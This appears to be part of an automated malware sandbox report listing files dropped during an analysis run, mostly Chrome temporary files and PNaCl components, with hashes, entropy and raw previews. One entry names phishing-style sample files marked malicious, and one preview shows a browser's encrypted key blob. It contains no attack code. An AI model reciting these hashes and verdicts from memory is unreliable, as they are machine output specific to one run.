SSDEEP:	384:l9JQfn9CcpWdBVOUD+N7rwvXN3AfVMHlkGcbr2hbfxwpx1Arq3my1iNzTTcOxZ7F:7xGa11yZ0csezvRJYnH+VKPdT5D
MD5:	A95E66E95D905D36656EBB64AE3D0C0E
SHA1:	EDB90ABA546D0B49AF5D04D0D324760A6DF9862A
SHA-256:	F8E19D6896EAECFD04F4593E4E3B56821F2A7F4F80BD53C0D880A9670E55A826
SHA-512:	CAB90882A03A4317C0A400EC815FC5D23DD8D2C74BC5CCA1BF3185445683E3FB907138CFC0FE3C24237C9AA25BBAF3344D2E313AB4A22520810811EB441DF1E7
Malicious:	false
Preview:	.q.................C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6......M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...SM8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.

C:\Users\user\AppData\Local\Google\Chrome\User Data\eed6ade0-4dfc-4b46-bb74-4cfdd21c3d03.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	197987
Entropy (8bit):	6.074203398417346
Encrypted:	false
SSDEEP:	6144:8mjwkXLsJeQBhCepsPmtaqfIlUOoSiuRG:8mdXQJeECaChox
MD5:	6512D2F26E38DB5F659DE90FFA439FA5
SHA1:	30655ECFB3649684B46E4D809CBA175768C0A4D1
SHA-256:	1C69AA180BBD4AEB5E50D36B440C31D8B4A5B80815D99C3A95F1F548EF207A92
SHA-512:	CA7B3EF6DBB9D48658E67AD82243851B3D3874650E355511A106A00817E164C2E59E93D8C428184C8069D6F91D0B46D2F1D06B5F08A037202EE79365E7C02C02
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.638846531476059e+12,"network":1.638814133e+12,"ticks":151462001.0,"uncertainty":4024403.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp

C:\Users\user\AppData\Local\Google\Chrome\User Data\f4384c0a-104e-436b-8a04-034a4aaa55a9.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	95428
Entropy (8bit):	3.7425053390199685
Encrypted:	false
SSDEEP:	384:V9JQfn9CcpWdBVOUD+N7rwvXN3AfVMHlkGcbr2hbfxwpx1Arq3my2IiNzTTcOxZU:LxGa11yZMcsezvRJYnH+VKPdT5a
MD5:	2962389534DB7C2E8F194959F3C101B5
SHA1:	2DC6429B9F0B5E727245CFE2B9F57348CD7B1130
SHA-256:	6D60D6581FDA86B771D62E9FCA80B9A435EB5CD4DBE5E5CC7808F4FA36D10B92
SHA-512:	E1BFF43BF98FE36016FA6B80DD0B8DB1DB774582D9E1F578790AD8659B44CEFA9997E96A0F7E010809B30D79D7040CF14534A42E1108E26B8E1454F0B519C118
Malicious:	false
Preview:	.t.................C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6......M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...SM8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1464
Entropy (8bit):	5.288330753428086
Encrypted:	false
SSDEEP:	24:3YQrLAo4KAxX5qRPD42HEezoFe9t4CvKuKnKJYTx9rkv9ekLAl/:BrB4nqRL/HEekFe9t4Cv94aYTx9w9bu
MD5:	830D7C609BD47A554F04933211AB7E7F
SHA1:	B46765EDB4907BA72B7A42AC0730302F0D78B37E
SHA-256:	0C5DDC8C171467DDB4D2AB6C2DB28858AE9BFE2DD38E40C87EAD9BA46521E761
SHA-512:	66B52F9AE7667C1D9ECBC5C682C8B37480A46C0E2CF081AFCEA29BF347E369BF6A7E30C1861A96334B1B5D53B04E7F537015E208EF0848A6B69F4340737437A1
Malicious:	false
Preview:	@...e...........)....................................@..........@...............Z.y1k+.O.n7.k...(.......System.IO.Compression...H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..8................'....L..}............System.Numerics.4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...

C:\Users\user\AppData\Local\Temp\2337b61c-de69-4ace-ab09-3189e352c1e2.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\321ad580-a91d-4f0e-8123-ba9aa2851051.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\390e5361-2779-4cb3-acd8-4110dc8c167d.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	248531
Entropy (8bit):	7.963657412635355
Encrypted:	false
SSDEEP:	3072:r+nmRykNgoldZ8GjJCiUXZSk+QSVh85PxEalRVHmcld9R6yYfEp4ABUGDcaKklrv:k3oF4Z4h45P99Fld9RBQYBVcaxlnfL
MD5:	541F52E24FE1EF9F8E12377A6CCAE0C0
SHA1:	189898BB2DCAE7D5A6057BC2D98B8B450AFAEBB6
SHA-256:	81E3A4D43A73699E1B7781723F56B8717175C536685C5450122B30789464AD82
SHA-512:	D779D78A15C5EFCA51EBD6B96A7CCB6D718741BDF7D9A37F53B2EB4B98AA1A78BC4CFA57D6E763AAB97276C8F9088940AC0476690D4D46023FF4BF52F3326C88
Malicious:	false
Preview:	Cr24..............0.."0....H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L\|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.\|1..n.<Fb..f..Q1.....s..2..{.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-eu...b.........\..F!...b...l5....zJ.q.......L].....w[T0.6....E.....r..%Z.vFm.9..5!,.~g5...;.t...']....+A.....u....k...e..&..l.6r[yU...%..f.......N..V.....<+.....l..}.{...z...)y.n..'..).....,.b....5.08K%..O.g..D.S.F5o..<(....>....\f..X..I..2."l...w....7f\|.~.c.4.E.......0..0....H............0.......).'..b.$w\$.q&.]zF_2..;...?.U,...W..L1.2...R..#....W.....c1k.$W..$.J....+M!.Hz.n`U.I)N.\|b.l....{.K@]6.LlP/....](.A..................I...).H....IQ.y.;MG.d..ix..#f.Z$\|..\|.?...0K...t"i..s...Y..%.Ky....0...{.!+.~v.;....J.....Z....).(6..@?v.;~..2..c....[0Y0....H.=.....H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. .0...\|!..A..L.+.=...kP.!.1..

C:\Users\user\AppData\Local\Temp\560c3c5f-35c2-4968-b922-58652e03e960.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	768843
Entropy (8bit):	7.992932603402907
Encrypted:	true
SSDEEP:	12288:cK2ED9wjXNC1Gse83ru82/u0eKhgxuPFrDXgtbPz54Pm1D0fBmfH1sBrJ9mTiDga:cK2ED9I48seur0/uZKCuPNbgtbz6m1ob
MD5:	A11D5CAF6BF849AEB84B0C95B1C3B7CF
SHA1:	27F410CCBD75852C01C7464A1FD7EF8C29BE3916
SHA-256:	D0E62ACE64AFC334330A7AC3A2CC657914FEB321F1F89AEE11D2A6D0E7D81C31
SHA-512:	086C124DE3A01BE467647F3BCB4EA05105F690AB45417A0E3D38935ABA9E2381DF59AF98D0FFF7823CEFD5390B48807352E135AC70977AED7B413A8CC48FB590
Malicious:	false
Preview:	Cr24..............0.."0....H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L\|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.\|1..n.<Fb..f..Q1.....s..2..{.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-eu...b.........6W..>Nuw9..R{c...Nq.H.K..A!....`v.k+..?.5.>v.....;.._~....tp....x.q.V...7.m.O.~.{!.o/q.'..BK..4./?'.....L..fH&.._<..&.p.k^..\s...:1y..F.N.+...X.PO@Mo....X.G1:..Y.@;..j..........=ae...0.......DU....n...n.;.Ipr..Q....:... <.....a.Y....{ei........0..0....H............0.......Mbh=.[O}.+..U.KHF(n3.\"...,g.c...6)..(.E...U...#.i.a..:...N.....P...x.O...(mC;\|.5.S.{m.aEx...[..fP.i`.y..5..R....v.$......l-m.............m....ni...`..W.....R.p.b.+...+.\k.R$e~.J\.&c%.d...M..j..V.%...+1F....D....X\.1ct.<........E.B.+.i@...8..^...&YR...I.o...,.....[0Y0....H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. D.'.N@.(..GK....m...A.0.."

C:\Users\user\AppData\Local\Temp\7040_2142074851\_metadata\verified_contents.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3034
Entropy (8bit):	5.876664552417901
Encrypted:	false
SSDEEP:	48:p/hEc9q0S+UTKYM43z8nqMsfWRUWEADM/W9n7lqFkakzcVTGkcYTPi6zM:RGcg5z/jjjHgUnV278+aWLy4
MD5:	8B6C3E16DFBF5FD1C9AC2267801DB38E
SHA1:	F5CADC5914DF858C96C189B092BC89C29407BBAA
SHA-256:	FD986A547D9585E98F451B87CA85DEB4B61EE540C6FAC678D7BEDABF04653095
SHA-512:	37048EF8FADF62A26CAEC6EE90AC192429AB1E99424E5C68FACA90C0DAD68642C761FDCAC03FC38FA930841F91FA145A6943EC7F168D4F2FA426F1F092C2F502
Malicious:	false
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJfcGxhdGZvcm1fc3BlY2lmaWMveDg2XzY0L3BuYWNsX3B1YmxpY19wbmFjbF9qc29uIiwicm9vdF9oYXNoIjoiVkNUSHNJVHNUSXVncWNhV2ctWHVpTU1sdWloV1FSTE1sQnpTTGprdGhETSJ9LHsicGF0aCI6Il9wbGF0Zm9ybV9zcGVjaWZpYy94ODZfNjQvcG5hY2xfcHVibGljX3g4Nl82NF9jcnRiZWdpbl9mb3JfZWhfbyIsInJvb3RfaGFzaCI6ImxINWt2a1BvSVZZczZKVHhyOHc5Q2MxXzloVEJCX3lVSlF6VDZseVVNd0kifSx7InBhdGgiOiJfcGxhdGZvcm1fc3BlY2lmaWMveDg2XzY0L3BuYWNsX3B1YmxpY194ODZfNjRfY3J0YmVnaW5fbyIsInJvb3RfaGFzaCI6IkVuLVFQTW1HUm1xbG9Ud1gzOTAzckpsMkw0R25sQmdET1FhZlNKaHJ4Nk0ifSx7InBhdGgiOiJfcGxhdGZvcm1fc3BlY2lmaWMveDg2XzY0L3BuYWNsX3B1YmxpY194ODZfNjRfY3J0ZW5kX28iLCJyb290X2hhc2giOiJkT2lJVzRmdEdGNW9FY0k1UXYyYjBmdXNrUlYyaUVtdmxhbmV6MlpFc3VvIn0seyJwYXRoIjoiX3BsYXRmb3JtX3NwZWNpZmljL3g4Nl82NC9wbmFjbF9wdWJsaWNfeDg2XzY0X2xkX25leGUiLCJyb290X2hhc2giOiIzNEU5QU9EMmpqLWNoMzZQZ0NVV0YtMUpYWVhVdlNGY1I4bks1aWppcWNjIn0seyJwYXRoIjoiX3B

C:\Users\user\AppData\Local\Temp\7040_2142074851\_platform_specific\x86_64\pnacl_public_pnacl_json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	507
Entropy (8bit):	4.68252584617246
Encrypted:	false
SSDEEP:	12:TjLJ7qaVgPPd8bdzQBXefosmc5T9+n6e1Cetm1JXcAwA:TJ7jViPOd8wfHmZ6RP15
MD5:	35D5F285F255682477F4C50E93299146
SHA1:	FB58813C4D785412F05962CD379434669DE79C2B
SHA-256:	5424C7B084EC4C8BA0A9C69683E5EE88C325BA28564112CC941CD22E392D8433
SHA-512:	59DF2D5F2684FACC80C72F9C4B7E280F705776076C9D843534F772D5A3D578BEE04289AEE81320F23FB4D743F3969EDF5BA53FEBBAC8A4D27F3BC53BCF271C3E
Malicious:	false
Preview:	{. "COMMENT": [. "This file serves as a template for the resource info description used by ", . "the NaCl Chrome plugin. It is kept in the NaCl repository to prevent ", . "hard-coding of NaCl-specific information inside the Chrome repository.". ], . "abi-version": 1, . "pnacl-arch": "x86-64", . "pnacl-ld-name": "ld.nexe", . "pnacl-llc-name": "pnacl-llc.nexe", . "pnacl-sz-name": "pnacl-sz.nexe", . "pnacl-version": "5dfe030a71ca66e72c5719ef5034c2ed24706c43".}

C:\Users\user\AppData\Local\Temp\7040_2142074851\_platform_specific\x86_64\pnacl_public_x86_64_crtbegin_for_eh_o Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
Category:	dropped
Size (bytes):	2712
Entropy (8bit):	3.4025803725190906
Encrypted:	false
SSDEEP:	48:b/5D5V5PK82aTS6aTTw0Do1DttoyDNsEA:b/hbVic1ZtLDNsE
MD5:	604FF8F351A88E7A1DBD7C836378AE86
SHA1:	9D8D89AE9F13D6306E619A4EAAD51EDE91A5F9F3
SHA-256:	947E64BE43E821562CE894F1AFCC3D09CD7FF614C107FC94250CD3EA5C943302
SHA-512:	85B1EDA4C473E00034EE627B7ABB894A77E521BC6A91A91A4A3744CA7511CB0AF10B9723D9ECC2CE3378DD70B659DF842D8C11875958CB77070CF01EC0A15840
Malicious:	false
Preview:	.ELF..............>.................................@.....@.......................................PH.......,$J.l=....J.$<A[..@.A...M..A..ffffff..................PH......,$J.l=....J.$<A[..D..A...M..A..ffffff..................PH..1..,$J.l=....J.$<A[.......A...M..A..ffffff..................PH..SP..h.........fff...................h.........fff.............J.$<[.,$J.l=....J.$<.....f.....................................................................................................................................................................................NaCl....x86-64...........zR..x......................@....C....C.........8.......@....C....C.........T.......@....C....C.........p.......`....C....C..B...... .......................<...............@.......X.......................t........................clang version 3.7.0 (https://chromium.googlesource.com/a/native_client/pnacl-clang.git ce163fdd0f16b4481e5cf77a16d45e9b4dc8300e) (https://chromium.googlesource.com/a/native_client/pna

C:\Users\user\AppData\Local\Temp\7040_2142074851\_platform_specific\x86_64\pnacl_public_x86_64_crtbegin_o Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
Category:	dropped
Size (bytes):	2776
Entropy (8bit):	3.5335802354066246
Encrypted:	false
SSDEEP:	48:b/5D5V5ej5ej5PjDdaTS6aTTw6DV1DtFouoyDOsTy:b/hbEEVJB1ZFhLDOsT
MD5:	88C08CD63DE9EA244F70BFC53BBCADF6
SHA1:	8F38A113A66B18BAA02E2C995099CF1145A29DAA
SHA-256:	127F903CC986466AA5A13C17DFDD37AC99762F81A794180339069F48986BC7A3
SHA-512:	78D2500493A65A23D101EC2420DC5F0CE8C75EFAC425C28547121643E4FB568E9D827EF2C0F7068159E043C86B986F29BF92C6BADC675F160B63C7B3512EB95F
Malicious:	false
Preview:	.ELF..............>.....................X...........@.....@.......................................PH.......,$J.l=....J.$<A[..@.A...M..A..ffffff..................PH......,$J.l=....J.$<A[..D..A...M..A..ffffff..................PH..1..,$J.l=....J.$<A[.......A...M..A..ffffff..................PH..,$J.l=....J.$<A[f........A...M..A..ffffff..................PH..,$J.l=....J.$<A[f........A...M..A..ffffff..................PH..SP..h.........fff.............J.$<[.,$J.l=....J.$<.....f.K...............`.......P.......................z...................................NaCl....x86-64...clang version 3.7.0 (https://chromium.googlesource.com/a/native_client/pnacl-clang.git ce163fdd0f16b4481e5cf77a16d45e9b4dc8300e) (https://chromium.googlesource.com/a/native_client/pnacl-llvm.git 7251d5b59fca15195c94a3a7da70f0081724448f)............zR..x......................@....C....C.........8.......@....C....C.........T.......@....C....C.........p.......@....C....C.................@....C....C.................@...

C:\Users\user\AppData\Local\Temp\7040_2142074851\_platform_specific\x86_64\pnacl_public_x86_64_crtend_o Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
Category:	dropped
Size (bytes):	1520
Entropy (8bit):	2.799960074375893
Encrypted:	false
SSDEEP:	12:Bvx/ekjlM/NQQmTfR9yp9396QQmTfR9C6wRqD8MTDDw7lEOkSbfuEAXwX6BX2U8b:bDjO/NbmT3296bmT3Twk8qDwh7b7CD8
MD5:	75E79F5DB777862140B04CC6861C84A7
SHA1:	4DB7BDC80206765461AC68CEC03CE28689BBEE0C
SHA-256:	74E8885B87ED185E6811C23942FD9BD1FBAC9115768849AF95A9DECF6644B2EA
SHA-512:	FE3F86E926759E71494F2060C4ED3C883EBCAF20CB129A5AD7F142766C33FAB10B5FABC3C7C938E0E895E27EA0AC03CBFE8D0EEABF5300A4AD07F67FD96CC253
Malicious:	false
Preview:	.ELF..............>.................................@.....@.........................NaCl....x86-64.......clang version 3.7.0 (https://chromium.googlesource.com/a/native_client/pnacl-clang.git ce163fdd0f16b4481e5cf77a16d45e9b4dc8300e) (https://chromium.googlesource.com/a/native_client/pnacl-llvm.git 7251d5b59fca15195c94a3a7da70f0081724448f)...text..comment..bss..group..note.GNU-stack..eh_frame..shstrtab..strtab..symtab..data..note.NaCl.ABI.x86-64.......................................................!................................................................................................................................................................................................../../../pnacl/support/crtend.c.__EH_FRAME_END__...............................................................................................@...............................................................H.......................................P.......................H...............................

C:\Users\user\AppData\Local\Temp\7040_2142074851\_platform_specific\x86_64\pnacl_public_x86_64_ld_nexe Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=7511538a3a6a0b862c772eace49075ed1bbe2377, stripped
Category:	dropped
Size (bytes):	2163864
Entropy (8bit):	6.07050487397106
Encrypted:	false
SSDEEP:	24576:HPHonIwYZJ0ykwVO7Owf31yJKzCtxO8RSV4lY+PbeHVxCtjFV4lBNeSAmfGqa+A7:HvSMRwf3SKmlY+PyPvnM2Gq+
MD5:	0BB967D2E99BE65C05A646BC67734833
SHA1:	220A41A326F85081A74C4BB7C5F4E115D1B4B960
SHA-256:	C6C2D0C2FC3E38A9BFA19C78066439C2F745393F1FD1C49C3C6777F697222C76
SHA-512:	8EF8689E00E4B210A30444D18ED6247F364995ABEB2FD272064C3AF671EEDB4D9B8B67CA56F72FEBF8F56896D4EA7EC4B10CB445FFA1C710C1F312E9DA0E4896
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Microsoft Document.htm, Detection: malicious, Browse Filename: File.html, Detection: malicious, Browse Filename: SecuredMessage.html, Detection: malicious, Browse Filename: Microsoft Document.htm, Detection: malicious, Browse Filename: Microsoft Document.htm, Detection: malicious, Browse Filename: Carl.shepherd-VoiceFax-720-6145-720.html, Detection: malicious, Browse Filename: SecuredMessage.html, Detection: malicious, Browse Filename: pkeyuibx.exe, Detection: malicious, Browse Filename: #Ud83d#Udce8 INV statement.htm, Detection: malicious, Browse Filename: message_zdm.html, Detection: malicious, Browse Filename: SecuredMessage.html, Detection: malicious, Browse Filename: cC6A9znVtH.exe, Detection: malicious, Browse Filename: TaylormadegolfFile Received December 03,2021-03_43_52 AM.html, Detection: malicious, Browse Filename: Todd.neely-VoiceFax-572-2536-572.html, Detection: malicious, Browse Filename: michael.schwab-1VN.htm, Detection: malicious, Browse Filename: 4HhMAtU4Ok.exe, Detection: malicious, Browse Filename: Payment Confirmation.html, Detection: malicious, Browse Filename: AX-426495-pdf.htm, Detection: malicious, Browse Filename: 'Vm Note'jgable On Thu, 02 Dec 2021 001533 +0100.html, Detection: malicious, Browse Filename: PaymentAdvice_53-44955876.htm, Detection: malicious, Browse
Preview:	.ELF..............>..... .......@.........!.........@.8...@......................................................................................................................................................{......W...............................................@.......@...............P.td.....h.......h.......h......4b......4b..............Q.td................................................................NaCl....x86-64..............GNU.u.S.:j..,w...u...#w.......?......Y@.......@......1@......B@......P@.....@X@.....``@......h@.....pp@.....H.@.......@.......@.......@.......@.......@....`..@.......@.......A.......A......................p................@..............?.......A.........5.....?5.5...?.5.....?......P9..............PC.......?......0@................aCoc...?..`.(..?.y.P.D.?<.s..O.u......$@.......@...............@........................................ ... ....... .......@...`...`...`...`...................`...`...`...`...`...`...`...................................`...

C:\Users\user\AppData\Local\Temp\7040_2142074851\_platform_specific\x86_64\pnacl_public_x86_64_libcrt_platform_a Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	current ar archive
Category:	dropped
Size (bytes):	40552
Entropy (8bit):	4.127255967843258
Encrypted:	false
SSDEEP:	768:xlP+1fzyUNVU5LmKxeOnjpD5eA/eUnUUxvT:xlP+1ryYMTekpD5eAWjuvT
MD5:	0CE951B216FCF76F754C9A845700F042
SHA1:	6F99A259C0C8DAD5AD29EE983D35B6A0835D8555
SHA-256:	7A1852EA4BB14A2A623521FA53F41F02F8BA3052046CF1AA0903CFAD0D1E1A7B
SHA-512:	7C2F9BF90EB1F43C17B4E14A077759FA9DC62A7239890975B2D6FD543B31289DC3B49AE456CA73B98DE9AC372034F340C708D23D9D3AAB05CCBDABDC56A6314E
Malicious:	false
Preview:	!<arch>./ 0 0 0 0 624 `...................,...8...Z(..e...e...t...t...y`..y`..y`..y`..y`..y`..y`..y`..y`..y`..y`..y`..y`..y`........................fmod.fmodf.memcmp.memcpy.memmove.memset.__nacl_read_tp.__pnacl_init_irt.longjmp.setjmp.__Sz_fptosi_f32_i64.__Sz_fptosi_f64_i64.__Sz_fptoui_f32_i32.__Sz_fptoui_f32_i64.__Sz_fptoui_f64_i32.__Sz_fptoui_f64_i64.__Sz_sitofp_i64_f32.__Sz_sitofp_i64_f64.__Sz_uitofp_i32_f32.__Sz_uitofp_i32_f64.__Sz_uitofp_i64_f32.__Sz_uitofp_i64_f64.nacl_tp_tdb_offset.nacl_tp_tls_offset.__Sz_bitcast_16xi1_i16.__Sz_bitcast_8xi1_i8.__Sz_bitcast_i16_16xi1.__Sz_bitcast_i8_8xi1.__Sz_fptoui_4xi32_f32.__Sz_uitofp_4xi32_4xf32..e_fmod.o/ 0 0 0 644 2792 `..ELF..............>.....................(...........@.....@.......................................PH..AVAUATSfI.~.M..I.. E....@.A......D..D1.......8fI.~.M.....I.. E..A......D..D..t.D....D..f....D..=....r...Y...^.[A\A]A^..@..,$J.l=....J.$<A[A...M..

C:\Users\user\AppData\Local\Temp\7040_2142074851\_platform_specific\x86_64\pnacl_public_x86_64_libgcc_a Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	current ar archive
Category:	dropped
Size (bytes):	132784
Entropy (8bit):	3.6998481247844937
Encrypted:	false
SSDEEP:	384:Hf0mOXYmeKzQUIdedRFvT5p1Ee2HyAlL3O4:Hf7OXdmWRJT5p1R2HyAhO4
MD5:	C37CA2EB468E6F05A4E37DF6E6020D0F
SHA1:	EA787E5EADFB488632EC60D8B80B555796FA9FE9
SHA-256:	C1483ED423FEE15D86E8B5D698B2CDAB89186CE7FF9C4E3D5F3F961FD80D7C6E
SHA-512:	01281DE92B281FB29E1ACA96AA64B740B65CC3A9097307827F0D8DB9E1C164C56AFCDFA0BF138EA670A596D55CE2C8D722760744E9FC9343BB6514417BF333BA
Malicious:	false
